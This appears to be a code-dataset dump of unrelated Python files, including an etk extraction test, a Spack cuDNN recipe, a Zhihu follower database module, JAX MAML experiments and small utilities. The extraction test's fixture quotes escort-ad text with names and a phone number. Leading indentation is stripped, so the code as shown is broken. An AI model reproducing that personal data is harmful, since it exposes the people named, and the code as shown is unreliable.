self.assertTrue("text" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_relaxed"])
self.assertTrue("title" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens" in r["content_extraction"]["title"])
self.assertTrue("inferlink_extractions" in r["content_extraction"])
ie_ex = r["content_extraction"]["inferlink_extractions"]
self.assertTrue("inferlink_location" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_location"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_location"])
self.assertTrue("inferlink_age" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_age"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_age"])
self.assertTrue("inferlink_phone" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_phone"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_phone"])
self.assertTrue("inferlink_posting-date" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_posting-date"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_posting-date"])
self.assertTrue("inferlink_description" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_description"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_description"])
results = r["knowledge_graph"]["name"]
expected = [
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
}
],
"key": "helena",
"value": "helena"
},
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "title",
"context": {
"start": 9,
"end": 10,
"input": "tokens",
"text": "2013 escort alert ! - <etk 'attribute' = 'name'>luna</etk> the hot playmate ( 323 "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "inferlink_description",
"context": {
"start": 4,
"end": 5,
"input": "tokens",
"text": "hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
}
],
"key": "luna",
"value": "luna"
}
]
        self.assertEqual(expected, results)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
161386 | <filename>Leetcode/0429. N-ary Tree Level Order Traversal.py
from collections import deque
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class Solution:
def levelOrder(self, root: Node) -> list[list[int]]:
if not root:
return root
result = []
queue = deque([root])
while queue:
tempList = []
for _ in range(len(queue)):
node = queue.popleft()
tempList.append(node.val)
if node.children:
queue.extend(node.children)
result.append(tempList)
return result
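# Each node is enqueued and dequeued exactly once, so this runs in O(n) time
# with O(n) extra space for the queue and the result lists.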
| StarcoderdataPython |
12547 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class Cudnn(Package):
"""NVIDIA cuDNN is a GPU-accelerated library of primitives for deep
neural networks"""
homepage = "https://developer.nvidia.com/cudnn"
# Latest versions available at:
# https://developer.nvidia.com/rdp/cudnn-download
# Archived versions available at:
# https://developer.nvidia.com/rdp/cudnn-archive
# Note that download links don't work from command line,
# need to use modified URLs like in url_for_version.
maintainers = ['adamjstewart']
# cuDNN 8.0.2
version('8.0.2.39-11.0-linux-x64',
sha256='672f46288b8edd98f8d156a4f1ff518201ca6de0cff67915ceaa37f6d6d86345')
version('8.0.2.39-11.0-linux-ppc64le',
sha256='b7c1ce5b1191eb007ba3455ea5f497fdce293a646545d8a6ed93e9bb06d7f057')
version('8.0.2.39-10.2-linux-x64',
sha256='c9cbe5c211360f3cfbc0fb104f0e9096b37e53f89392525679f049276b2f701f')
version('8.0.2.39-10.2-linux-ppc64le',
sha256='c32325ff84a8123491f2e58b3694885a9a672005bc21764b38874688c0e43262')
version('8.0.2.39-10.1-linux-x64',
sha256='82148a68bd6bdaab93af5e05bb1842b8ccb3ab7de7bed41f609a7616c102213d')
version('8.0.2.39-10.1-linux-ppc64le',
sha256='8196ec4f031356317baeccefbc4f61c8fccb2cf0bdef0a6431438918ddf68fb9')
# cuDNN 8.0
version('8.0.0.180-11.0-linux-x64',
sha256='9e75ea70280a77de815e0bdc85d08b67e081bc99a708b574092142344d2ba07e')
version('8.0.0.180-11.0-linux-ppc64le',
sha256='1229e94731bbca63ee7f5a239f4e1838a51a301d896f3097fbf7377d74704060')
version('8.0.0.180-10.2-linux-x64',
sha256='0c87c12358ee2b99d57c2a8c7560e3bb93e54bb929f5f8bec4964a72a2bb261d')
version('8.0.0.180-10.2-linux-ppc64le',
sha256='59e4ad6db15fcc374976e8052fe39e3f30f34079710fb3c7751a64c853d9243f')
# cuDNN 7.6.5
version('7.6.5.32-10.2-linux-x64',
sha256='600267f2caaed2fd58eb214ba669d8ea35f396a7d19b94822e6b36f9f7088c20',
preferred=True)
version('7.6.5.32-10.2-linux-ppc64le',
sha256='7dc08b6ab9331bfd12207d4802c61db1ad7cace7395b67a6e7b16efa0335668b')
version('7.6.5.32-10.1-linux-x64',
sha256='7eaec8039a2c30ab0bc758d303588767693def6bf49b22485a2c00bf2e136cb3')
version('7.6.5.32-10.1-osx-x64',
sha256='8ecce28a5ed388a2b9b2d239e08d7c550f53b79288e6d9e5eb4c152bfc711aff')
version('7.6.5.32-10.1-linux-ppc64le',
sha256='97b2faf73eedfc128f2f5762784d21467a95b2d5ba719825419c058f427cbf56')
version('7.6.5.32-10.0-linux-x64',
sha256='28355e395f0b2b93ac2c83b61360b35ba6cd0377e44e78be197b6b61b4b492ba')
version('7.6.5.32-10.0-osx-x64',
sha256='6fa0b819374da49102e285ecf7fcb8879df4d0b3cc430cc8b781cdeb41009b47')
version('7.6.5.32-10.0-linux-ppc64le',
sha256='b1717f4570083bbfc6b8b59f280bae4e4197cc1cb50e9d873c05adf670084c5b')
version('7.6.5.32-9.2-linux-x64',
sha256='a2a2c7a8ba7b16d323b651766ee37dcfdbc2b50d920f73f8fde85005424960e4')
version('7.6.5.32-9.2-linux-ppc64le',
sha256='a11f44f9a827b7e69f527a9d260f1637694ff7c1674a3e46bd9ec054a08f9a76')
version('7.6.5.32-9.0-linux-x64',
sha256='bd0a4c0090d5b02feec3f195738968690cc2470b9bc6026e6fe8ff245cd261c8')
# cuDNN 7.6.4
version('7.6.4.38-10.1-linux-x64',
sha256='32091d115c0373027418620a09ebec3658a6bc467d011de7cdd0eb07d644b099')
version('7.6.4.38-10.1-osx-x64',
sha256='bfced062c3689ced2c1fb49c7d5052e6bc3da6974c1eb707e4dcf8cd209d4236')
version('7.6.4.38-10.1-linux-ppc64le',
sha256='f3615fea50986a4dfd05d7a0cf83396dfdceefa9c209e8bf9691e20a48e420ce')
version('7.6.4.38-10.0-linux-x64',
sha256='417bb5daf51377037eb2f5c87649000ca1b9cec0acb16cfe07cb1d3e9a961dbf')
version('7.6.4.38-10.0-osx-x64',
sha256='af01ab841caec25087776a6b8fc7782883da12e590e24825ad1031f9ae0ed4b1')
version('7.6.4.38-10.0-linux-ppc64le',
sha256='c1725ad6bd7d7741e080a1e6da4b62eac027a94ac55c606cce261e3f829400bb')
version('7.6.4.38-9.2-linux-x64',
sha256='c79156531e641289b6a6952888b9637059ef30defd43c3cf82acf38d67f60a27')
version('7.6.4.38-9.2-linux-ppc64le',
sha256='98d8aae2dcd851558397a9a30b73242f257e1556be17c83650e63a0685969884')
version('7.6.4.38-9.0-linux-x64',
sha256='8db78c3623c192d4f03f3087b41c32cb0baac95e13408b5d9dabe626cb4aab5d')
# cuDNN 7.6.3
version('7.6.3.30-10.1-linux-x64',
sha256='352557346d8111e2f954c494be1a90207103d316b8777c33e62b3a7f7b708961')
version('7.6.3.30-10.1-linux-ppc64le',
sha256='f274735a8fc31923d3623b1c3d2b1d0d35bb176687077c6a4d4353c6b900d8ee')
# cuDNN 7.5.1
version('7.5.1.10-10.1-linux-x64',
sha256='2c833f43c9147d9a25a20947a4c5a5f5c33b2443240fd767f63b330c482e68e0')
version('7.5.1.10-10.1-linux-ppc64le',
sha256='a9e23bc83c970daec20874ccd1d8d80b648adf15440ecd0164818b330b1e2663')
version('7.5.1.10-10.0-linux-x64',
sha256='c0a4ec438920aa581dd567117b9c316745b4a451ac739b1e04939a3d8b229985')
version('7.5.1.10-10.0-linux-ppc64le',
sha256='d9205718da5fbab85433476f9ff61fcf4b889d216d6eea26753bbc24d115dd70')
# cuDNN 7.5.0
version('7.5.0.56-10.1-linux-x64',
sha256='c31697d6b71afe62838ad2e57da3c3c9419c4e9f5635d14b683ebe63f904fbc8')
version('7.5.0.56-10.1-linux-ppc64le',
sha256='15415eb714ab86ab6c7531f2cac6474b5dafd989479b062776c670b190e43638')
version('7.5.0.56-10.0-linux-x64',
sha256='701097882cb745d4683bb7ff6c33b8a35c7c81be31bac78f05bad130e7e0b781')
version('7.5.0.56-10.0-linux-ppc64le',
sha256='f0c1cbd9de553c8e2a3893915bd5fff57b30e368ef4c964d783b6a877869e93a')
# cuDNN 7.3.0
version('7.3.0.29-9.0-linux-x64',
sha256='403f9043ff2c7b2c5967454872275d07bca11fd41dfc7b21995eadcad6dbe49b')
# cuDNN 7.2.1
version('7.2.1.38-9.0-linux-x64',
sha256='cf007437b9ac6250ec63b89c25f248d2597fdd01369c80146567f78e75ce4e37')
# cuDNN 7.1.3
version('7.1.3-9.1-linux-x64',
sha256='dd616d3794167ceb923d706bf73e8d6acdda770751492b921ee6827cdf190228')
version('7.1.3-9.1-linux-ppc64le',
sha256='e3b4837f711b98a52faacc872a68b332c833917ef3cf87c0108f1d01af9b2931')
# cuDNN 6.0
version('6.0-8.0-linux-x64',
sha256='9b09110af48c9a4d7b6344eb4b3e344daa84987ed6177d5c44319732f3bb7f9c')
# cuDNN 5.1
version('5.1-8.0-linux-x64',
sha256='c10719b36f2dd6e9ddc63e3189affaa1a94d7d027e63b71c3f64d449ab0645ce')
# CUDA 10.2
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.2-linux-x64')
# CUDA 10.1
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.3.30-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.3.30-10.1-linux-ppc64le')
depends_on('[email protected]:10.1.999', when='@7.5.0.56-10.1-linux-x64')
depends_on('[email protected]:10.1.999', when='@7.5.0.56-10.1-linux-ppc64le')
# CUDA 10.0
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.5.1.10-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.5.1.10-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.5.0.56-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.5.0.56-10.0-linux-ppc64le')
# CUDA 9.2
depends_on('[email protected]:9.2.999', when='@7.6.5.32-9.2-linux-x64')
depends_on('[email protected]:9.2.999', when='@7.6.5.32-9.2-linux-ppc64le')
depends_on('[email protected]:9.2.999', when='@7.6.4.38-9.2-linux-x64')
depends_on('[email protected]:9.2.999', when='@7.6.4.38-9.2-linux-ppc64le')
# CUDA 9.1
depends_on('[email protected]:9.1.999', when='@7.1.3-9.1-linux-x64')
depends_on('[email protected]:9.1.999', when='@7.1.3-9.1-linux-ppc64le')
# CUDA 9.0
depends_on('[email protected]:9.0.999', when='@7.6.5.32-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.6.4.38-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.3.0.29-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.2.1.38-9.0-linux-x64')
# CUDA 8.0
depends_on('[email protected]:8.0.999', when='@6.0-8.0-linux-x64')
depends_on('[email protected]:8.0.999', when='@5.1-8.0-linux-x64')
def url_for_version(self, version):
url = 'https://developer.download.nvidia.com/compute/redist/cudnn/v{0}/cudnn-{1}-v{2}.tgz'
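        # For example, version 7.6.5.32-10.2-linux-x64 resolves to
        # .../cudnn/v7.6.5/cudnn-10.2-linux-x64-v7.6.5.32.tgz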
if version >= Version('7.2'):
directory = version[:3]
ver = version[:4]
cuda = version[4:]
elif version >= Version('7.1'):
directory = version[:3]
ver = version[:2]
cuda = version[3:]
elif version >= Version('7.0'):
directory = version[:3]
ver = version[0]
cuda = version[3:]
else:
directory = version[:2]
ver = version[:2]
cuda = version[2:]
return url.format(directory, cuda, ver)
def setup_run_environment(self, env):
if 'target=ppc64le: platform=linux' in self.spec:
env.set('cuDNN_ROOT', os.path.join(
self.prefix, 'targets', 'ppc64le-linux'))
def install(self, spec, prefix):
install_tree('.', prefix)
if 'target=ppc64le: platform=linux' in spec:
symlink(os.path.join(prefix, 'targets', 'ppc64le-linux', 'lib'),
prefix.lib)
symlink(
os.path.join(prefix, 'targets', 'ppc64le-linux', 'include'),
prefix.include)
| StarcoderdataPython |
3246341 | <reponame>Yappawu/qqqfome
import os
import sqlite3
import json
import logging
import datetime
from zhihu import Author, ZhihuClient
from . import common as c
from . import strings as s
L = logging.getLogger('qqqufome-db')
def set_logger_level(level):
c.check_type(level, 'level', logging.NOTSET)
global L
L.setLevel(level)
def set_logger_handle(handle):
L.addHandler(handle)
def author_to_db_filename(author):
c.check_type(author, 'author', Author)
return author.id + '.sqlite3'
def create_db(author):
c.check_type(author, 'author', Author)
filename = author_to_db_filename(author)
L.info(s.log_get_user_id.format(filename))
if os.path.isfile(filename):
e = FileExistsError()
e.filename = filename
raise e
L.info(s.log_db_not_exist_create.format(filename))
db = sqlite3.connect(author_to_db_filename(author))
L.info(s.log_connected_to_db.format(filename))
return db
def connect_db(database):
c.check_type(database, 'database', str)
if not os.path.isfile(database):
e = FileNotFoundError()
e.filename = database
raise e
return sqlite3.connect(database)
def create_table(db: sqlite3.Connection):
c.check_type(db, 'db', sqlite3.Connection)
L.info(s.log_create_table_in_db)
with db:
db.execute(
'''
CREATE TABLE followers
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT NOT NULL,
in_name TEXT NOT NULL
);
'''
)
db.execute(
"""
CREATE TABLE meta
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT NOT NULL,
in_name TEXT NOT NULL,
cookies TEXT NOT NULL
);
"""
)
db.execute(
"""
CREATE TABLE log
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
time DATETIME NOT NULL,
follower_number INT NOT NULL,
increase INT NOT NULL,
message TEXT NOT NULL
);
"""
)
L.info(s.success)
def add_user_to_db(db, author):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(author, 'author', Author)
with db:
L.debug(s.log_add_user_to_db.format(author.name))
db.execute(
"""
INSERT INTO followers
(name, in_name) VALUES
( ?, ? );
""",
(author.name, author.id)
)
def dump_init_data_to_db(db, author):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(author, 'author', Author)
# meta data
with db:
name = author.name
in_name = author.id
cookies = json.dumps(author._session.cookies.get_dict())
db.execute(
"""
INSERT INTO meta
(name, in_name, cookies) VALUES
( ?, ?, ? );
""",
(name, in_name, cookies)
)
# followers
L.info(s.log_start_get_followers.format(author.name))
with db:
for _, follower in zip(range(100), author.followers):
add_user_to_db(db, follower)
# log
with db:
log_to_db(db, author.follower_num, s.log_db_init)
def is_db_closed(db):
c.check_type(db, 'db', sqlite3.Connection)
try:
with db:
db.execute(
"""
SELECT name from sqlite_master where type = 'table';
"""
)
return False
except sqlite3.ProgrammingError:
return True
def close_db(db):
c.check_type(db, 'db', sqlite3.Connection)
if not is_db_closed(db):
db.close()
L.info(s.log_close_db)
def get_cookies(db):
c.check_type(db, 'db', sqlite3.Connection)
cursor = db.execute('SELECT cookies from meta')
row = cursor.fetchone()
if row is None:
return None
return row[0]
def log_to_db(db, follower_num, message):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(follower_num, 'follower_num', int)
c.check_type(message, 'message', str)
cursor = db.execute(
"""
SELECT follower_number FROM log ORDER BY id DESC;
"""
)
row = cursor.fetchone()
if row:
increase = follower_num - row[0]
else:
# first log
increase = 0
with db:
db.execute(
"""
INSERT INTO log
(time, follower_number, increase, message) VALUES
( ?, ?, ?, ? );
""",
(datetime.datetime.now(), follower_num, increase, message)
)
def is_in_db(db, in_name):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(in_name, 'in_name', str)
with db:
cursor = db.execute(
"""
SELECT * FROM followers WHERE in_name = ?;
""",
(in_name,)
)
row = cursor.fetchone()
return row is not None
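# Illustrative usage sketch (not from the original source): wiring the helpers
# together for an existing database file, assuming `author` is a zhihu Author
# obtained elsewhere via ZhihuClient.
def _example_usage(database_path, author):  # hypothetical helper, illustration only
    db = connect_db(database_path)          # raises FileNotFoundError if the file is missing
    if not is_in_db(db, author.id):
        add_user_to_db(db, author)
    log_to_db(db, author.follower_num, 'manual check')
    close_db(db)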
| StarcoderdataPython |
3282169 | import bpy
def apply_render_settings(render_engine,resolution_x,resolution_y,resolution_percentage,pixel_aspect_x,pixel_aspect_y):
bpy.context.scene.render.engine = render_engine
bpy.context.scene.render.resolution_x = resolution_x
bpy.context.scene.render.resolution_y = resolution_y
bpy.context.scene.render.resolution_percentage = resolution_percentage
bpy.context.scene.render.pixel_aspect_x = pixel_aspect_x
bpy.context.scene.render.pixel_aspect_y = pixel_aspect_y
def copy_render_settings(strip):
scene = bpy.context.scene
strip.render_engine = scene.render.engine
strip.resolution_x = scene.render.resolution_x
strip.resolution_y = scene.render.resolution_y
strip.resolution_percentage = scene.render.resolution_percentage
strip.pixel_aspect_x = scene.render.pixel_aspect_x
strip.pixel_aspect_y = scene.render.pixel_aspect_y
def get_available_render_engines():
internal_engines = [("BLENDER_EEVEE","Eevee","Eevee"), ("BLENDER_WORKBENCH","Workbench","Workbench")]
external_engines = set((e.bl_idname,e.bl_label,e.bl_label) for e in bpy.types.RenderEngine.__subclasses__())
return internal_engines + list(external_engines)
def get_available_render_engines_values():
return [e[0] for e in get_available_render_engines()]
def ShowMessageBox(message = "", title = "Message Box", icon = 'INFO'):
def draw(self, context):
self.layout.label(text=message)
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
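# Illustrative usage sketch (not from the original source): how these helpers
# might be combined, assuming `strip` exposes the custom render-setting
# properties written by copy_render_settings (a hypothetical property group).
def _example_usage(strip):
    copy_render_settings(strip)  # snapshot the current scene settings onto the strip
    if strip.render_engine not in get_available_render_engines_values():
        ShowMessageBox("Unknown render engine", title="Warning", icon='ERROR')
    apply_render_settings(strip.render_engine,
                          strip.resolution_x, strip.resolution_y,
                          strip.resolution_percentage,
                          strip.pixel_aspect_x, strip.pixel_aspect_y)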
| StarcoderdataPython |
1734060 | #%%
from functools import partial
import jax
import jax.numpy as np
from jax import random, vmap, jit, grad
from jax.experimental import stax, optimizers
from jax.experimental.stax import Dense, Relu
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
#%%
# Use stax to set up network initialization and evaluation functions
net_init, net_apply = stax.serial(
Dense(40), Relu,
Dense(40), Relu,
Dense(1)
)
in_shape = (-1, 1,)
rng = random.PRNGKey(0)
out_shape, params = net_init(rng, in_shape)
#%%
import numpy as onp
def get_wave(wave_gen, n_samples=100, wave_params=False):
x = wave_gen(n_samples)
amp = onp.random.uniform(low=0.1, high=5.0)
phase = onp.random.uniform(low=0., high=onp.pi)
wave_data = x, onp.sin(x + phase) * amp
if wave_params: wave_data = (wave_data, (phase, amp))
return wave_data
def vis_wave_gen(N): # better for visualization
x = onp.linspace(-5, 5, N).reshape((N, 1))
return x
def train_wave_gen(N): # for model training
x = onp.random.uniform(low=-5., high=5., size=(N, 1))
return x
def mse(params, batch):
x, y = batch
ypred = net_apply(params, x)
return np.mean((y - ypred)**2)
#%%
batch = get_wave(vis_wave_gen, 100)
predictions = net_apply(params, batch[0])
losses = mse(params, batch)
plt.plot(batch[0], predictions, label='prediction')
plt.plot(*batch, label='target')
plt.legend()
#%%
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-2)
@jit
def step(i, opt_state, batch):
params = get_params(opt_state)
g = grad(mse)(params, batch)
return opt_update(i, g, opt_state)
#%%
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
batch = get_wave(vis_wave_gen, 100)
for i in range(200):
opt_state = step(i, opt_state, batch)
params = get_params(opt_state)
xb, yb = batch
plt.plot(xb, net_apply(params, xb), label='prediction')
plt.plot(xb, yb, label='target')
plt.legend()
# %%
### MAML
alpha = 0.1
# inner loop -- take one gradient step on the data
def inner_update(params, batch):
grads = grad(mse)(params, batch)
sgd_update = lambda param, grad: param - alpha * grad
inner_params = jax.tree_multimap(sgd_update, params, grads)
return inner_params
# outer loop
def maml_loss(params, train_batch, test_batch):
task_params = inner_update(params, train_batch)
loss = mse(task_params, test_batch)
return loss
@jit
def maml_step(i, opt_state, train_batch, test_batch):
params = get_params(opt_state)
g = grad(maml_loss)(params, train_batch, test_batch)
return opt_update(i, g, opt_state)
## task extractor
def get_task(n_train, n_test, wave_params=False):
if not wave_params:
batch = get_wave(train_wave_gen, n_train + n_test)
else:
batch, wparams = get_wave(train_wave_gen, n_train + n_test, wave_params=True)
# extract train/test elements from batch=(xb, yb) with treemap :)
train_batch = jax.tree_map(lambda l: l[:n_train], batch, is_leaf=lambda node: hasattr(node, 'shape'))
test_batch = jax.tree_map(lambda l: l[n_train:], batch, is_leaf=lambda node: hasattr(node, 'shape'))
task = train_batch, test_batch
if wave_params: task = (*task, wparams)
return task
# %%
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-3)
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
for i in tqdm(range(20000)):
train_batch, test_batch = get_task(20, 1)
opt_state = maml_step(i, opt_state, train_batch, test_batch)
params = get_params(opt_state)
# %%
train_batch, test_batch, wparams = get_task(20, 1, wave_params=True)
# re-create wave smoother for visualization
phase, amp = wparams
x = vis_wave_gen(100)
y = np.sin(x + phase) * amp
plt.plot(x, y, label='targets')
step_params = params.copy()
for i in range(5): # visualize wave at each grad step
ypred = net_apply(step_params, x)
plt.plot(x, ypred, label=f'step{i}')
step_params = inner_update(step_params, train_batch)
plt.legend()
# %%
task_batch_size = 5
tasks = [get_task(20, 1) for _ in range(task_batch_size)]
train_batch, test_batch = jax.tree_multimap(lambda *b: np.stack(b), *tasks, is_leaf=lambda node: hasattr(node, 'shape'))
xb, yb = train_batch
for i in range(len(xb)):
plt.scatter(xb[i], yb[i])
# %%
def batch_maml_loss(params, train_batch, test_batch):
losses = vmap(partial(maml_loss, params))(train_batch, test_batch)
loss = losses.mean()
return loss
@jit
def batch_maml_step(i, opt_state, train_batch, test_batch):
params = get_params(opt_state)
g = grad(batch_maml_loss)(params, train_batch, test_batch)
return opt_update(i, g, opt_state)
# %%
task_batch_size = 4
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-3)
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
for i in tqdm(range(20000)):
# get batch of tasks
tasks = [get_task(20, 1) for _ in range(task_batch_size)]
train_batch, test_batch = jax.tree_multimap(lambda *b: np.stack(b), *tasks, is_leaf=lambda node: hasattr(node, 'shape'))
# take gradient step over the mean
opt_state = batch_maml_step(i, opt_state, train_batch, test_batch)
params = get_params(opt_state)
# %%
train_batch, test_batch, wparams = get_task(20, 1, wave_params=True)
# re-create wave smoother for visualization
phase, amp = wparams
x = vis_wave_gen(100)
y = np.sin(x + phase) * amp
plt.plot(x, y, label='targets')
plt.scatter(*train_batch, label='train')
step_params = params.copy()
for i in range(5): # visualize wave at each grad step
ypred = net_apply(step_params, x)
plt.plot(x, ypred, label=f'step{i}')
step_params = inner_update(step_params, train_batch)
plt.legend()
# %%
| StarcoderdataPython |
54611 | SEED = 1
TOPIC_POKEMONS = 'pokemons'
TOPIC_USERS = 'users'
GROUP_DASHBOARD = 'dashboard'
GROUP_LOGIN_CHECKER = 'checker'
DATA = 'data/pokemon.csv'
COORDINATES = {
'GAUSS_LAT_MADRID': {'mu': 40.45, 'sigma': 0.2},
'GAUSS_LON_MADRID': {'mu': -3.60, 'sigma': 0.4},
'GAUSS_LAT_SEGOVIA': {'mu': 40.95, 'sigma': 0.1},
'GAUSS_LON_SEGOVIA': {'mu': -4.12, 'sigma': 0.2}
}
MEAN_INTERVAL = 3
MEAN_LOGIN = 5
NUM_USERS = 5
| StarcoderdataPython |
1654332 | # -*- coding: utf-8 -*-
from enum import Enum
class Style(Enum):
"""
This class represent the text style in ShellColor.
"""
NONE = 0
BOLD = 1
LIGHT = 2
UNDERLINE = 4
BLINK = 5
INVERSE = 7
HIDDEN = 8
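# Illustrative usage sketch (not from the original source): the member values
# match ANSI SGR codes, so on an ANSI-capable terminal a style can be applied
# with a small hypothetical helper like this.
def _styled(text, style=Style.BOLD):
    return '\033[{}m{}\033[0m'.format(style.value, text)
# print(_styled('warning', Style.UNDERLINE))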
| StarcoderdataPython |
1796775 | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import geoip2.database
reader = geoip2.database.Reader('./data/GeoLite2-Country_20190806/GeoLite2-Country.mmdb')
def getCountryCode(ip: str):
try:
return reader.country(ip).country.iso_code
except:
return None
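# Illustrative usage sketch (not from the original source), assuming the
# GeoLite2 database file exists at the path above.
if __name__ == '__main__':
    for ip in ('8.8.8.8', '127.0.0.1'):
        print(ip, getCountryCode(ip))  # addresses missing from the database yield None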
| StarcoderdataPython |
3359797 | # coding=utf-8
# Copyright 2022 The Fiddle-Config Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A test module used in `module_reflection_test`."""
import fiddle as fdl
# Note: normally, this function should be defined in a different module!
def function_to_configure(x: int, y: str):
return x, y
def simple_base():
return fdl.Config(function_to_configure, x=2)
def alternate_base():
return fdl.Config(function_to_configure, x=0)
def base_with_defaults(x: int = 5, negative: bool = False):
